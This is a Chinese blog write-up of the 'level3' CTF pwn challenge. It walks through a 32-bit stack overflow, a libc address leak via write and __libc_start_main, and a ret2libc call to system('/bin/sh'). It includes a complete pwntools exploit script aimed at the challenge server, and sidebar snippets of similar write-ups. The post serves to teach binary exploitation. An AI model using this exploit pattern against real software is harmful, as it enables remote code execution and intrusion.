level3--writeup

最新推荐文章于 2023-09-29 18:26:51 发布
最新推荐文章于 2023-09-29 18:26:51 发布
阅读量617 收藏 4
点赞数 21
分类专栏: CTF-PWN # 攻防世界-pwn -- WriteUp 文章标签: CTF PWN 栈溢出 libc 攻防世界
本文为ATFWUS原创,允许转载,但请附上作者署名和本文链接
本文链接:https://blog.csdn.net/ATFWUS/article/details/104610203
版权

文件下载地址:

链接:https://pan.baidu.com/s/1ByM1Dbt5j7Gw9mNkWryAVA
提取码:pqzc 

目录

0x01.分析

checksec:

查看源码:

 

程序流程:

漏洞利用:

0x02.exp

0x03.说明

0x01.分析

checksec:

32位程序,开启了NX。

查看源码:

 

程序流程:

流程很简单,程序先输入,然后我们输入。

漏洞利用:

  1. 很明显read处栈溢出。
  2. 计算得到栈溢出的偏移量为140。
  3. 寻找system函数或/bin/sh。
  4. 没有找到上述。
  5. 题目提供了一个libc文件,提示也是libc。
  6. 我们想到泄露libc基址的办法。
  7. 泄露一个已经执行过的函数,这里选用__libc_start_main。
  8. 利用存在的函数把这个要泄露的函数的地址打印出来。
  9. 接收地址,并使用LibcSearcher工具查询libc版本。(也可以用一个网站,应该题目提供的libc文件有用,但我没有用到)。
  10. 计算出libc的基址,并求得sytem和/bin/sh得地址。
  11. 控制程序返回到main函数,再进行一次栈溢出,执行system函数,得到shell。

0x02.exp

##!/usr/bin/env python
from pwn import*
from LibcSearcher import LibcSearcher

r=remote("111.198.29.45",36406)
#r=process('./level3')
elf=ELF('./level3')

write_plt=elf.plt['write']
libc_start_main_got=elf.got['__libc_start_main']
main=elf.symbols['_start']

payload=flat([140*'A',write_plt,main,1,libc_start_main_got,4])
r.sendlineafter("Input:\n",payload)

libc_start_main_adr=u32(r.recv()[0:4])

libc=LibcSearcher('__libc_start_main',libc_start_main_adr)
libcbase=libc_start_main_adr-libc.dump('__libc_start_main')

system_adr=libcbase+libc.dump('system')
bin_sh_adr=libcbase+libc.dump('str_bin_sh')

payload=flat([140*'A',system_adr,0,bin_sh_adr])
r.sendline(payload)
r.interactive()

0x03.说明

题目提供了libc文件,但我暂时不知道怎么使用,应该是用于查询libc版本的。

 用LibcSearcher会有多种可能,并且本地测试,和服务器测试都不一样的。

由于种数比较少,我就直接一个个试,最后得到正确的libc版本,获取shell。

 

ATFWUS
关注
  • 21
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防世界pwn-level3】
a_silly_coder的博客
02-17 3254
下载文件后首先查看保护,发现可以进行栈溢出攻击 将文件拖入32位ida 进入vulnerable_function后,发现了read处有栈溢出漏洞 在查看代码后,发现没有提供system和bin/sh,但是由于给了libc,所以可以找到libc的偏移量,然后计算出system和bin/sh的加载地址。 对于plt表,got表,实际加载地址,我是这么理解的:通过elf.plt['write']获取到的是write在plt表中的地址1,这个地址1上存放的实际内容是write在got表的地..
Zero-level-DFD-one-page-writeup
03-12
其中包含:- 1.零级DFD。 档案名称:-DFD_Level_0.png 2.一页写作。 文件名:-PECommerce-WriteUP.docx
writeup-开源
05-13
用于将源文档转换为HTML或XML的编程语言。 Writeup是标记语言(类似于markdown)和宏预处理语言的组合,该宏语言可以为文档建立正式的生产系统。
HITCON 2018 baby_tcache学习(以及_IO_FILE泄露libc基础)
a2590035252的博客
10-08 280
IO_FILE漏洞利用基础中的基础中的基础
http://91.3p7.us/index.php,bee/new.go at b412890c3385694a5a0034d07c703f1eabd3a22e · ws6/bee · GitHub...
热门推荐
weixin_42348783的博客
03-16 27万+
background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAADICAYAAACtWK6eAAAgAElEQVR42uy9d5Rd13Xm+TvnxhfrVS5UIRSIQEIAQUpMIKlEylGWZblbTi27veyWJXcvjZqW7TVrrPG0Q0vyTKtHtnuWou0ZS1Y7yDOyksd...
攻防世界 Pwn level3
MrTreebook的博客
11-22 272
攻防世界pwn level31.checksec看一下保护2.IDA反汇编分析程序3.漏洞利用4.exp附上 1.checksec看一下保护 [*] '/home/ububtu/ctf/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) 32位,开启NX保
pwn level3
weixin_45677731的博客
03-15 513
解压之后有一个level3和libc_32.so.6,拖进ida(32位) 主要就是这两个函数,一个write和一个read 这道题的基本思路就是通过第一次溢出将write函数在got表中的地址泄露,然后减去在libc_32.so.6中的偏移,得到基地址,在加上ibc_32.so.6中找到的system和"/bin/sh"偏移得到真实的地址,然后再执行一次main函数进行第二次溢出 对于writ...
Jarvis OJ - pwn level3
hanqdi_的博客
02-03 217
前言 因为换了电脑,GitHub博客的环境搭起来太麻烦了,又想有所记录,所以又回到这里啦~ level3 前段时间做过pwn题目,现在再来做,发现以前很简单的脚本利用命令都忘记了,真是,啥东西都不能放,一放就忘,这脑子不管用了。 之后每天保持做题量,保持做题手感!在这里记录并且作为监督自己的一种方式。 做题思路 没有system和binsh,又给出了libc文件,容易想到可以用ret2libc方法...
攻防世界 pwn level3
Bsecure的博客
06-06 994
level3 开始查保护后没注意到NX,在栈上几次没执行成功才回去看到。这个题实际还是栈溢出,但多考了很多知识点,对刚接触pwn收获还是很大。 首先查保护,只开了NX,没有canary,那就可以往靠溢出控制程序走向了的方向看题。 载入ida后,栈溢出很明显。 但利用起来,既没有有system函数,也没有’/bin/sh’。这对于刚接触pwn还是比较困难的,但本来就学习的过程,看了writeup又去学了下.plt与.got再来做的题。 其实程序带了一个运行库的,里面有动态链接库的函数
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1645
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
D3CTF2022-官方WriteUp1
08-03
D3CTF2022-官方WriteUp1
Systems-Administration-Writeup
04-02
系统管理-课程撰写 内容 ---- ---正则 -- - - ---- ---- -
Java编码技巧:验证码
qq_42449963的博客
09-29 9896
目录1.1、EasyCaptcha(优选,支持种类多,样式多,使用简单)1.1.1、作用1.1.2、官方信息1.1.3、使用案例1.1.4、依赖1.1.5、代码1.1.6、效果1.1.7、拓展1.2、kaptcha1.2.1、作用1.2.2、官方信息1.2.3、使用案例1.2.4、依赖1.2.5、代码1.2.6、效果1.3、AJ-Captcha(TODO)1.3.1、作用1.3.2、官方信息1.3.3、依赖1.3.4、代码1.3.5、效果1.4、tianai-captcha(TODO)1.4.1、作用1.4
Escape Codec Library: ecl.js Shift_JISエンコードやEUC-JPエンコードなども可能な escape エンコード・デコード関数のライブラリ
hualaomi的专栏
08-07 7250
 Escape Codec Library: ecl.js Shift_JISエンコードやEUC-JPエンコードなども可能な escape エンコード・デコード関数のライブラリ文字列をすべてのコンピュータで読めるような形式に変換したり、変換されたものを元の文字列にデコードすることができる関数のライブラリです。 ビルトイン関数 escape() , unescape() とは異な
安装percona 5.7
架构师的成长之路的博客
12-19 1803
环境搭建二安装数据库mysql percona 5.7安装percona 5.7首先,你需要设置Percona的Yum库:yum install http://www.percona.com/downloads/percona-release/redhat/0.1-4/percona-release-0.1-4.noarch.rpm接下来安装Percona:yum install Percona-...
test
dragonzoebai的专栏
05-05 3万+
package org.my.cameratest; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; import org.kobjects.base64.Base64; import org.ksoap2.SoapEnvelope; import org.ksoap2.seri
xctf pwn 踩坑笔记(一):以xctf入门题level3为例
xiongzixun的博客
10-30 491
操作环境:ubuntu16.04 +惠普台式机 IDA环境:win10 +联想笔记本** 1.打开文件 xctf中的附件一般为application/octet-stream 而且为了能够使用,我们必须要先通过chmod命令获得X权限 如果是压缩文件还要先unzip或者tar等试一下 然后,通过checksec 这个文件以后,一定要先关注Arch,也就是这个ELF究竟是64位,还是32位。 因...
栈帧(Stack Frame)
ATFWUS的博客
02-27 4万+
0x01.栈在计算机中的应用 在计算机系统中,栈也可以称之为栈内存是一个具有动态内存区域,存储函数内部(包括main函数)的局部变量和方法调用和函数参数值,是由系统自动分配的,一般速度较快;存储地址是连续且存在有限栈容量,会出现溢出现象,程序可以将数据压入栈中,也可以将数据从栈顶弹出。压栈操作使得栈增大,而弹出操作使栈减小。 栈用于维护函数调用的上下文,离开了栈,函数调用就没法实现。 栈是从...
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATFWUS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值